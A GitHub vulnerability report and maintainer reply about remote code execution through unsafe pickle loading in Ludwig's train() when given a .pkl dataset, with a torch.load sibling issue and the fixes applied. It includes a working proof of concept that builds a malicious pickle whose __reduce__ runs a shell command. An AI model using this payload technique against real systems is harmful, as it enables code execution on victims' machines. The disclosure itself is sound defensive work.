### ISSUE TITLE
Vulnerability Report: RCE via unsafe Python deserialization in LudwigModel.train(dataset=<*.pkl>) auto-dispatch

### ISSUE THREAD

**Issue by ghost** [ludwig-ai/ludwig#4188]
## Severity

CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H = 8.8 High

CWE-502 (Deserialization of Untrusted Data).

## Description

Ludwig's public `LudwigModel.train(dataset=<path>)` API auto-detects data format from file extension via `EXTENSION_TO_FORMAT`. The mapping includes `.pkl` and `.pickle`, which route to a Preprocessor that calls `pd.read_pickle()`. Pandas' read_pickle invokes the stdlib unsafe-object-graph loader, which executes any object's `__reduce__` method on deserialization. Result: arbitrary code execution as the Ludwig process when the user trains on (or merely passes the path of) an attacker-supplied `.pkl` file.

No special config required; no flag required; reaches the sink BEFORE model setup begins.

### 1. Format dispatcher — `ludwig/data/format_registry.py:14-33`

```python
EXTENSION_TO_FORMAT = {
    ".csv": "csv",
    ".tsv": "tsv",
    # ... safe formats ...
    ".pickle": "pickle",   # <-- RCE class (line 29)
    ".pkl": "pickle",      # <-- RCE class (line 30)
    ".hdf5": "hdf5",
    ".h5": "hdf5",
}

def detect_format(path):
    return EXTENSION_TO_FORMAT.get(ext)
```

### 2. Preprocessor invokes the sink — `ludwig/utils/data_utils.py:275-283`

```python
def read_pickle(data_fp, df_lib, **kwargs):
    try:
        return df_lib.read_pickle(data_fp)
    except (AttributeError, NotImplementedError):
        logger.warning("Falling back to pd.read_pickle() since dask backend does not support it")
        return dd.from_pandas(pd.read_pickle(data_fp), npartitions=1)
    return df_lib.read_pickle(data_fp)   # line 283
```

### 3. Dispatch wiring — `ludwig/data/preprocessing.py:638, 1147`

`class PicklePreprocessor(DataFormatPreprocessor)` at line 638; the preprocessor registry at line 1147 maps every entry in `PICKLE_FORMATS` → `PicklePreprocessor`.

### 4. Sibling sink (same bug class, distinct location)

`ludwig/models/ecd.py:243, 256` and `ludwig/utils/checkpoint_utils.py:146, 183` call `torch.load(path)` without `weights_only=True`. These fire on `LudwigModel.load(attacker_path)` for a `.ckpt`-suffixed file, yielding the same RCE primitive via PyTorch's loader. Notable for defense-in-depth: this finding's primary fix (remove pkl/pickle from EXTENSION_TO_FORMAT) does not close the sibling sink, which should also be patched (`weights_only=True` default + SafeTensors migration).

## Reachability

`LudwigModel.train(dataset="...")` is the canonical documented API surface. Users routinely pass dataset paths from:
- Kaggle dataset auto-fetch
- HuggingFace dataset cache + Ludwig wrappers
- S3 / GCS dataset shares between collaborators
- CI/CD jobs pointing Ludwig at test fixtures
- Jupyter notebooks running Ludwig with cloud credentials in scope

Any of these flows that includes a path string with `.pkl` or `.pickle` extension routes through the vulnerable preprocessor. No `data_format="pickle"` flag is required — the extension alone triggers it.

## Proof of Concept

```python
# Step 1: attacker writes malicious data file using stdlib unsafe-object serializer
import os
class Exploit:
    def __reduce__(self):
        return (os.system, ("touch /tmp/ludwig-RCE && id > /tmp/ludwig-RCE",))

import pickle
with open("/tmp/evil.pkl", "wb") as f:
    pickle.dump(Exploit(), f)

# Step 2: victim calls Ludwig's documented training API on the path
from ludwig.api import LudwigModel
config = {
    "input_features": [{"name": "x", "type": "number"}],
    "output_features": [{"name": "y", "type": "number"}],
}
LudwigModel(config).train(dataset="/tmp/evil.pkl")
# RCE fires inside read_pickle() before any training begins
```

Verified outcome on local run: `/tmp/ludwig-RCE` created with content from `id` (uid/gid output).

Independent verification path (bypasses Ludwig wrapper, isolates sink):

```python
import pandas as pd
pd.read_pickle("/tmp/evil.pkl")
# Same RCE primitive; confirms Ludwig is reaching the well-known pandas/pkl sink
```

## Impact

Arbitrary code execution as the Ludwig process. Common deployment contexts:
- **CI/CD pipelines**: pipeline secrets, cloud-API credentials, artifact-store write access
- **Ray clusters**: multi-tenant compute, lateral movement across worker nodes
- **Jupyter notebooks**: often have broad filesystem access and persistent credentials in the kernel env
- **AutoML platforms**: user-submitted datasets reach the trainer without sanitization

A single `.pkl` upload to a downstream service routes through Ludwig's auto-format-detection and becomes RCE.

### Primary: strip pkl/pickle from auto-dispatch

```python
# ludwig/data/format_registry.py
EXTENSION_TO_FORMAT = {
    ".csv": "csv", ".tsv": "tsv", ".json": "json", ".jsonl": "jsonl",
    ".xlsx": "excel", ".xls": "excel", ".parquet": "parquet",
    ".feather": "feather", ".fwf": "fwf", ".html": "html",
    ".orc": "orc", ".sas7bdat": "sas", ".sav": "spss", ".dta": "stata",
    ".hdf5": "hdf5", ".h5": "hdf5",
    # REMOVED: .pickle, .pkl — invokes RCE-class loader on attacker-controlled bytes
}
```

If backwards compatibility is required, gate via explicit `data_format="pickle"` kwarg PLUS `LUDWIG_ALLOW_PICKLE_DATASETS=1` environment opt-in PLUS a warning logged on every dispatch.

### Sibling: harden `torch.load`

```python
# ludwig/models/ecd.py and ludwig/utils/checkpoint_utils.py
# Default weights_only=True; allow opt-out only via explicit kwarg
torch.load(path, weights_only=True)
```

Migrate to SafeTensors as the preferred checkpoint format (Ludwig already supports it).

## References

- Vulnerable extension map: https://github.com/ludwig-ai/ludwig/blob/master/ludwig/data/format_registry.py#L14
- read_pkl sink: https://github.com/ludwig-ai/ludwig/blob/master/ludwig/utils/data_utils.py#L275
- PicklePreprocessor: https://github.com/ludwig-ai/ludwig/blob/master/ludwig/data/preprocessing.py#L638
- Bug class CWE-502: https://cwe.mitre.org/data/definitions/502.html
- Pandas read_pickle security note (warns "loading data received from untrusted sources can be unsafe")

## Environment

- Ludwig master HEAD as of 2026-05-17; all three vulnerable files unchanged since 2026-05-13 PoC reproduction
- Verified with `pip install ludwig` (>=0.10) + local clone
- PoC reproduces on Linux + macOS

---

Reporter: Jaeyoung Yun (GitHub: JAE0Y2N)

**Comment by w4nderlust** [comment]
Thank you for the detailed report and the PoC — this was accurate and well-scoped. Fixed in #4190, now on main.

---

**Primary fix — RCE via pickle auto-dispatch**

Removed `.pkl`, `.pickle`, and `.p` from all extension-to-format dispatch paths (`format_registry.py` and the legacy fallback in `data_utils.py`). The extension-based auto-dispatch was the attack surface — a `.pkl` suffix on any dataset path was sufficient to route through `pd.read_pickle()` with no user opt-in required.

Users who genuinely need pickle can still pass `data_format="pickle"` explicitly. We also added a `logger.warning` inside `read_pickle()` that fires on every invocation, so the security risk is always surfaced in logs regardless of how the opt-in is done.

**Sibling fix — `torch.load` without `weights_only`**

Applied `weights_only=True` to three of the four `torch.load` calls:

- `checkpoint_utils.py:get_state_for_inference` — loads legacy model weights (tensors only) → `weights_only=True`
- `ecd.py` (two legacy checkpoint paths) — loads model state dicts from user-supplied paths → `weights_only=True`

The fourth call — `checkpoint_utils.py:load()` — reads Ludwig's own internal meta-checkpoint containing optimizer and scheduler state. Ludwig uses `LambdaLR` and `SequentialLR`, whose state dicts can include non-tensor Python objects (lambda closures, step counters). `weights_only=True` would break checkpoint resume for those schedulers. This file is an internal trusted artifact written by Ludwig itself during training, not a user-supplied path, so the threat model is meaningfully different. We left it as `weights_only=False` with an explicit comment documenting the reason.

**What we kept**

`read_pickle()` remains reachable via explicit `data_format="pickle"` rather than being removed entirely. Removing it entirely would be a harder break for existing workflows where users knowingly load their own trusted pickle files. The warning on every call is the backstop.
